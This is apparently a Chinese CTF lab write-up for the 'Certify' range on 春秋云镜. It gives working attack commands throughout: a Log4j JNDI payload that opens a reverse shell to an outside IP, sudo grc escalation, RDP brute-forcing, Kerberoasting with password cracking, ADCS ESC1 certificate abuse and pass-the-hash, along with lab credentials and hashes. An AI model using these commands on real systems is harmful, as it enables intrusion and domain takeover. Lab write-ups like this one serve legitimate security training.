春秋云镜-Certify
信息收集
Flag01
发现有一个Solr Admin的框架,尝试利用msf打
发现打的不太行
看一下页面,发现Solr Admin使用了log4j的插件,可以打一下log4j RCE
打一个Log4j shell
发现这里是有可以执行命令的操作的,修改为Log4j的poc
${jndi:ldap://116.62.53.46:1389/Basic/ReverseShell/116.62.53.46/3333}
之后发现可以sudo提权
sudo /usr/bin/grc --pty /bin/sh
flag{c6a57acd-029d-4650-a11a-524ce7ee986a}Flag02
之后getshell后,自己服务器起一个python服务,上传frp以及fscan
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 4
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.7:88 open
172.22.9.47:445 open
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] NetBios 172.22.9.7 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47 fileserver Windows 6.1
[*] NetInfo
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] OsInfo 172.22.9.47 (Windows 6.1)
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin之后frp做个代理,看一下内网收集的信息
- 172.22.9.7 DC
- 172.22.9.19 入口IP
- 172.22.9.47 fileserver
- 172.22.9.26 域成员
[*] NetBios 172.22.9.47 fileserver Windows 6.1考虑可以SMB远程连接,不需要密码直接连即可
proxychains smbclient -L 172.22.9.47
proxychains smbclient \\\\172.22.9.47\\fileshare
Flag03
ADCS渗透->利用Certify
我们看到还有一些文件,全get下来
看一下数据库文件
发现用户名不知道,利用自带的user表进行rdp爆破一下,看看能不能远程登录
proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp -vV -e ns
zhangjian i9XDE02pLVf
liupeng fiAzGwEMgTY但是尝试登录不行
还是回到刚刚Flag2的提示
Impacket脚本利用指南(上) - 先知社区 (aliyun.com)
如果脚本不知道怎么利用可以看看上面这个文章
proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng
proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian
之后利用John爆破
john --wordlist=rockyou.txt hash
zhangxia\MyPass2@@6
之后成功RDP登录,发现机子不出网
但是我们没有别的可以上线的机子,无法转发上线
利用certitfy确定漏洞
https://github.com/Flangvik/SharpCollection/tree/master
Certify.exe find /vulnerable
ESC1利用前提条件:
msPKI-Certificates-Name-Flag:
- ENROLLEE_SUPPLIES_SUBJECT
表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括域管理员用户
PkiExtendedKeyUsage: Client Authentication
表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证
Enrollment Rights: NT Authority\Authenticated Users
表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书
为域管申请证书
Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator这里我远程连接显示报错,我就换linux的certify也就是certipy使用了
proxychains certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdoutCertificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Property Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
[!] Vulnerabilities
ESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication和certify.exe扫出来的差不多,只不过这里直接把漏洞点告诉了
proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.labproxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
得到域控的域管,之后hash传递即可(pth)
proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
Flag04
之后打DC就行
proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7
转载
分享
0 条评论
可输入 255 字
发布投稿
